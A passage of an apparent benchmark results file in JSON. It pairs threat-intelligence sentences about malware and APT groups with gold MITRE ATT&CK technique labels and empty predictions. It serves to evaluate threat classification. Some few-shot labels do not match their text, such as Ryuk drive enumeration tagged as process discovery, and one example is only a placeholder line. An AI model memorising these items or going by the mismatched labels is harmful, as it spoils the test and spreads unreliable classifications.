DNSChangers include rootkit components and even download additional malware.\n\t - T1014: Rootkit\n- Text: Axiom has used spear phishing to initially compromise victims.\n\t - T1566: Phishing\n- Text: UEFI bootkits are planted in the system firmware and are invisible to security software running within the operating system because the malware loads in the initial stage of the booting sequence.\n\t - T1542.001: Pre-OS Boot - System Firmware\n", + "input": "Hikit is a Rootkit that has been used by Axiom.", + "gold": "- T1014: Rootkit", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: JCry has achieved execution by luring users to click on a file that appeared to be an Adobe Flash Player update installer.\n\t - T1204.002: User Execution - Malicious File\n- Text: The Zip archive is encrypted with an unknown password, but we know it contains two files named joboffer.chm and thumb.db. The joboffer.chm file is a compiled HTML file that we believe loads and executes the \u2018thumb.db\u2019 file as a payload, but we cannot be absolutely sure as we do not have the password required to extract the files from the archive\n\t - T1218.001: System Binary Proxy Execution - Compiled HTML File\n- Text: Magic Hound used various social media channels (such as LinkedIn) as well as messaging services (such as WhatsApp) to spearphish victims.\n\t - T1566.003: Phishing - Spearphishing via Service\n", + "input": "Dark Caracal has used UPX to pack Bandook.", + "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Metamorfo has embedded a \"vmdetect.exe\" executable to identify virtual machines at the beginning of execution.\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: The OilRig group maintains their persistent attacks against government entities in the Middle East region using previously identified tools and tactics. In this instance a spear phishing email was used containing a lure designed to socially engineer and entice the victim to executing a malicious attachment. The attachment was identified as a variant of the OopsIE trojan we identified in February 2018. In this iteration of OopsIE, the general functionality largely remained the same but contained the addition of anti-analysis and anti-virtual machine capabilities to further evade detection from automated defensive systems. Attack Details In July 2018, we reported on a wave of OilRig attacks delivering a tool called QUADAGENT involving a Middle Eastern government agency. During that wave, we also observed OilRig leveraging additional compromised email accounts at the same government organization to send spear phishing emails delivering the OopsIE trojan as the payload instead of QUADAGENT. The OopsIE attack also targeted a government agency within the same nation state, though a different organization than the one targeted delivering QUADAGENT. The email subject was in Arabic, which translated to \u201cBusiness continuity management training\u201d. The email was sent to an address belonging to a user group, rather than a specific individual\u2019s email address. Evasion Techniques The OopsIE variant delivered in this attack begins its execution by performing a series of anti-VM and sandbox checks. If any of the checks described in Table 1 are successful, the Trojan will exit without running any of its functional code\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: After initial installation, Raindrop runs a computation to delay execution.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n", + "input": "Egregor has used multiple anti-analysis and anti-sandbox techniques to prevent automated analysis by sandboxes.", + "gold": "- T1497: Virtualization/Sandbox Evasion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: IcedID has embedded binaries within RC4 encrypted .png files.\n\t - T1027.003: Obfuscated Files or Information - Steganography\n- Text: Cutwail spam levels in the last three months have been significantly lower. The introduction of steganography may suggest that NARWHAL SPIDER has been developing new, innovative methods to evade detection and improve infection rates. Although not commonly used by eCrime actors, steganography has been used for malware delivery in the past, such as the Lurk Downloader and StegoLoader.\n\t - T1027.003: Obfuscated Files or Information - Steganography\n\t - T1001.002: Data Obfuscation - Steganography\n- Text: Operation Wocao has encrypted IP addresses used for \"Agent\" proxy hops with RC4.\n\t - T1001: Data Obfuscation\n", + "input": "PolyglotDuke can use steganography to hide C2 information in images.", + "gold": "- T1027.003: Obfuscated Files or Information - Steganography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The HTTP request retrieves contents of the files present in the repository with an interesting validation which checks that the retrieved file is a PNG. The file that was earlier retrieved was named \u201creadme.png\u201d; this PNG file has one of the malicious modules embedded in it. It then executes GetNumberOfMethods and saves the result obtained by the module. This result is committed to the remote repo under the metafiles directory with a filename denoting the time at which the module was executed. This file committed to the repo contains the result of the commands executed by the module on the target system. To commit the file the malware makes a PUT HTTP request to Github\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: Cyclops Blink can use a custom binary scheme to encode messages with specific commands and parameters to be executed.\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n- Text: can obtain passwords from common browsers and FTP clients.\n\t - T1003: OS Credential Dumping\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n", + "input": "Small Sieve has the ability to use the Telegram Bot API from Telegram Messenger to send and receive messages.", + "gold": "- T1102.002: Web Service - Bidirectional Communication", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DustySky has two hard-coded domains for C2 servers; if the first does not respond, it will try the second.\n\t - T1008: Fallback Channels\n- Text: Cherry Picker exfiltrates files over FTP.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: Shark has the ability to upload files from the compromised host over a DNS or HTTP C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "FIN7's Harpy backdoor malware can use DNS as a backup channel for C2 if HTTP fails.", + "gold": "- T1008: Fallback Channels", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GreyEnergy is packed for obfuscation.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: During Frankenstein, the threat actors used trojanized documents that retrieved remote templates from an adversary-controlled website.\n\t - T1221: Template Injection\n- Text: SUNBURST removed IFEO registry values to clean up traces of persistence.\n\t - T1070.009: Indicator Removal - Clear Persistence\n", + "input": "Misdat was typically packed using UPX.", + "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: InnaputRAT gathers volume drive information and system information.\n\t - T1082: System Information Discovery\n- Text: Qakbot has anti-analysis and anti-virtual machine checks. It will not continue to execute if any of the following exists in the system\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: QuasarRAT can enumerate the username and account type.\n\t - T1033: System Owner/User Discovery\n", + "input": "yty gathers the computer name, the serial number of the main disk volume, CPU information, Microsoft Windows version, and runs the command \"systeminfo\".", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access.\n\t - T1598.003: Phishing for Information - Spearphishing Link\n- Text: The very narrow and specific set of email identifiers and organizations observed by CTU researchers strongly indicate that the campaign is focused on U.S. Based on the identified targets, CTU researchers assess with low confidence that a Russian government-sponsored threat group may be responsible for this campaign. Third-party researchers attribute this campaign to the Russia-based IRON RITUAL threat group (also known as NOBELIUM and APT29). IRON RITUAL has been linked to the SUNBURST malware used in the SolarWinds supply chain attack\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: APT32 has lured targets to download a Cobalt Strike beacon by including a malicious link within spearphishing emails.\n\t - T1204.001: User Execution - Malicious Link\n", + "input": "Sandworm Team has crafted phishing emails containing malicious hyperlinks.", + "gold": "- T1566.002: Phishing - Spearphishing Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Flagpro has exfiltrated data to the C2 server.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: TajMahal has the ability to steal documents from the local system including the print spooler queue.\n\t - T1005: Data from Local System\n- Text: The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern\n\t - T1020: Automated Exfiltration\n", + "input": "During Operation Wocao, threat actors used the XServer backdoor to exfiltrate data.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Downdelph inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them.\n\t - T1001.001: Data Obfuscation - Junk Data\n- Text: APT29 has used large file sizes to avoid detection.\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n- Text: The group has used other forms of obfuscation, include commingling legitimate traffic with communications traffic so that network streams appear legitimate. Some malware that has been used by also uses steganography to hide communication in PNG image files.\n\t - T1001: Data Obfuscation\n", + "input": "PLEAD samples were found to be highly obfuscated with junk code.", + "gold": "- T1001.001: Data Obfuscation - Junk Data", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The implanted VBS file is capable of reporting information about infected machines and downloading additional payloads with an encoded format\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Duqu has used \"msiexec\" to execute malicious Windows Installer packages. Additionally, a PROPERTY=VALUE pair containing a 56-bit encryption key has been used to decrypt the main payload from the installer packages.\n\t - T1218.007: System Binary Proxy Execution - Msiexec\n- Text: PipeMon can install additional modules via C2 commands.\n\t - T1105: Ingress Tool Transfer\n", + "input": "QakBot can use VBS to download and execute malicious files.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Milan has run `C:\\Windows\\system32\\cmd.exe /c cmd /c dir c:\\users\\ /s 2>&1` to discover local accounts.\n\t - T1087.001: Account Discovery - Local Account\n- Text: The payload contains an exploit for the unpatched local privilege escalation vulnerability CVE-2015-1701 in Microsoft Windows. The exploit uses CVE-2015-1701 to execute a callback in userspace. The callback gets the EPROCESS structures of the current process and the System process, and copies data from the System token into the token of the current process. Upon completion, the payload continues execution in usermode with the privileges of the System process\n\t - T1134.001: Access Token Manipulation - Token Impersonation/Theft\n- Text: MacMa can enumerate running processes.\n\t - T1057: Process Discovery\n", + "input": "PowerSploit's \"Get-ProcessTokenGroup\" Privesc-PowerUp module can enumerate all SIDs associated with its current token.", + "gold": "- T1087.001: Account Discovery - Local Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Fgdump can dump Windows password hashes.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n- Text: Wizard Spider has gained access to credentials via exported copies of the ntds.dit Active Directory database.\n\t - T1003.003: OS Credential Dumping - NTDS\n- Text: Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n", + "input": "CrackMapExec can dump usernames and hashed passwords from the SAM.", + "gold": "- T1003.002: OS Credential Dumping - Security Account Manager", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Commands such as net view can be used in to gather information about available remote systems.\n\t - T1018: Remote System Discovery\n- Text: HELLOKITTY has the ability to enumerate network resources.\n\t - T1135: Network Share Discovery\n- Text: P.A.S. Webshell can display the /etc/passwd file on a compromised host.\n\t - T1087.001: Account Discovery - Local Account\n", + "input": "Bazar can enumerate remote systems using \" Net View\".", + "gold": "- T1018: Remote System Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: menuPass has installed updates and new malware on victims.\n\t - T1105: Ingress Tool Transfer\n- Text: MarkiRAT can use BITS Utility to connect with the C2 server.\n\t - T1197: BITS Jobs\n- Text: The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1027: Obfuscated Files or Information\n", + "input": "Patchwork payloads download additional files from the C2 server.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LOWBALL abuses the Dropbox cloud storage service for command and control (CnC)\n\t - T1102: Web Service\n- Text: RTM has used an RSS feed on Livejournal to update a list of encrypted C2 server names. RTM has also hidden Pony C2 server IP addresses within transactions on the Bitcoin and Namecoin blockchain.\n\t - T1102.001: Web Service - Dead Drop Resolver\n- Text: ZIRCONIUM has used Dropbox for C2 allowing upload and download of files as well as execution of arbitrary commands.\n\t - T1102.002: Web Service - Bidirectional Communication\n", + "input": "Rocke has used Pastebin, Gitee, and GitLab for Command and Control.", + "gold": "- T1102: Web Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When loaded, the FoggyWeb backdoor (originally named Microsoft.IdentityServer.WebExtension.dll by its developer) functions as a passive and persistent backdoor that allows abuse of the Security Assertion Markup Language (SAML) token. The backdoor configures HTTP listeners for actor-defined URIs that mimic the structure of the legitimate URIs used by the target\u2019s AD FS deployment. The custom listeners passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor. This version of FoggyWeb configures listeners for the following hardcoded URI patterns (which might vary per target\n\t - T1550: Use Alternate Authentication Material\n\t - T1040: Network Sniffing\n- Text: AADInternals can be used to create SAML tokens using the AD Federated Services token signing certificate.\n\t - T1606.002: Forge Web Credentials - SAML Tokens\n- Text: Volexity's investigation into this incident determined the attacker had accessed the Duo integration secret key (akey) from the OWA server. This key then allowed the attacker to derive a pre-computed value to be set in the duo-sid cookie. After successful password authentication, the server evaluated the duo-sid cookie and determined it to be valid. This allowed the attacker with knowledge of a user account and password to then completely bypass the MFA set on the account. It should be noted this is not a vulnerability with the MFA provider and underscores the need to ensure that all secrets associated with key integrations, such as those with an MFA provider, should be changed following a breach. Further, it is important that not only are passwords changed after a breach, but that passwords are not set to something similar to the previous password (e.g\n\t - T1550.004: Use Alternate Authentication Material - Web Session Cookie\n\t - T1606.001: Forge Web Credentials - Web Cookies\n", + "input": "UNC2452 used forged SAML tokens that allowed the actors to impersonate users and bypass MFA, enabling UNC2452 to access enterprise cloud applications and services.", + "gold": "- T1550: Use Alternate Authentication Material", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The TAINTEDSCRIBE main executable has disguised itself as Microsoft\u2019s Narrator.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: SUNSPOT malware was designed and used to insert SUNBURST into software builds of the SolarWinds Orion IT management product.\n\t - T1195.002: Supply Chain Compromise - Compromise Software Supply Chain\n- Text: We found a Coinminer bundled with the legitimate installer of video conferencing app Zoom, luring users who want to install the software but end up unwittingly downloading a malicious file. The compromised files are not from Zoom\u2019s official download center, and are assumed to come from fraudulent websites. We have been working with Zoom to ensure that they are able to communicate this to their users appropriately.\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1554: Compromise Host Software Binary\n\t - T1195.002: Supply Chain Compromise - Compromise Software Supply Chain\n\t - T1574.005: Hijack Execution Flow - Executable Installer File Permissions Weakness\n", + "input": "PROMETHIUM has disguised malicious installer files by bundling them with legitimate software installers.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In the first path, obtaining the SAML signing certificate normally entails first querying the private encryption key that resides on the AD FS container and then using that key to decrypt the signing certificate. The certificate can then be used to create illicit but valid SAML tokens that allow the actor to impersonate users, enabling them to access enterprise cloud applications and services\n\t - T1552.004: Unsecured Credentials - Private Keys\n\t - T1550: Use Alternate Authentication Material\n- Text: AADInternals can be used to create SAML tokens using the AD Federated Services token signing certificate.\n\t - T1606.002: Forge Web Credentials - SAML Tokens\n- Text: Volexity's investigation into this incident determined the attacker had accessed the Duo integration secret key (akey) from the OWA server. This key then allowed the attacker to derive a pre-computed value to be set in the duo-sid cookie. After successful password authentication, the server evaluated the duo-sid cookie and determined it to be valid. This allowed the attacker with knowledge of a user account and password to then completely bypass the MFA set on the account. It should be noted this is not a vulnerability with the MFA provider and underscores the need to ensure that all secrets associated with key integrations, such as those with an MFA provider, should be changed following a breach. Further, it is important that not only are passwords changed after a breach, but that passwords are not set to something similar to the previous password (e.g\n\t - T1550.004: Use Alternate Authentication Material - Web Session Cookie\n\t - T1606.001: Forge Web Credentials - Web Cookies\n", + "input": "APT29 used forged SAML tokens that allowed the actors to impersonate users and bypass MFA, enabling APT29 to access enterprise cloud applications and services.", + "gold": "- T1550: Use Alternate Authentication Material", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ryuk attempts to encrypt all mounted drives and hosts that have Address Resolution Protocol (ARP) entries (IP addresses) and it enumerates all mounted drives by calling GetLogicalDrives. For each mounted drive, Ryuk calls GetDriveTypeW to determine the drive\u2019s type. To retrieve IP addresses that have ARP entries, Ryuk calls GetIpNetTable. It iterates through all entries and then tries to enumerate files and folders on the remote host and encrypt the files\n\t - T1057: Process Discovery\n- Text: Remsec can obtain a list of users.\n\t - T1087.001: Account Discovery - Local Account\n- Text: \u201cdesktop.ini\u201d is used to invoke regasm.exe to launch the payload found in C:\\Users\\Public\\Libraries\\core.dll as a hidden window without returning any error codes.\n\t - T1622: Debugger Evasion\n", + "input": "Taidoor can use \"GetCurrentProcessId\" for process discovery.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lokibot has the ability to discover the domain name of the infected host.\n\t - T1016: System Network Configuration Discovery\n- Text: No matching sample found for T1557.002\n- Text: APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc. Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts. In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment. To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1021.004: Remote Services - SSH\n\t - T1018: Remote System Discovery\n\t - T1560.001: Archive Collected Data - Archive via Utility\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1090.001: Proxy - Internal Proxy\n", + "input": "InvisiMole gathers information on the IP forwarding table, MAC address, configured proxy, and network SSID.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Goopy has the ability to disable Microsoft Outlook's security policies to disable macro warnings.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: Stuxnet reduces the integrity level of objects to allow write actions.\n\t - T1562: Impair Defenses\n- Text: For Operation Spalax, the threat actors staged malware and malicious files in legitimate hosting services such as OneDrive or MediaFire.\n\t - T1608.001: Stage Capabilities - Upload Malware\n", + "input": "Magic Hound has disabled antivirus services on targeted systems in order to upload malicious payloads.", + "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This feature generates a stageless Beacon payload artifact, hosts it on Cobalt Strike\u2019s web server, and presents a one-liner to download and run the artifact\n\t - T1197: BITS Jobs\n- Text: The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques\n\t - T1105: Ingress Tool Transfer\n- Text: IcedID can inject itself into a suspended msiexec.exe process to send beacons to C2 while appearing as a normal msi application.\n\t - T1218.007: System Binary Proxy Execution - Msiexec\n", + "input": "APT41 used BITSAdmin to download and install payloads.", + "gold": "- T1197: BITS Jobs", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sliver has the ability to support C2 communications over HTTP/S.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: HAFNIUM has used ASCII encoding for C2 traffic.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: Metamorfo has communicated with hosts over raw TCP on port 9999.\n\t - T1571: Non-Standard Port\n", + "input": "Saint Bot has used HTTP for C2 communications.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Indrik Spider has used PsExec to stop services prior to the execution of ransomware.\n\t - T1489: Service Stop\n- Text: BRONZE BUTLER has incorporated code into several tools that attempts to terminate anti-virus processes.\n\t - T1562.001: Impair 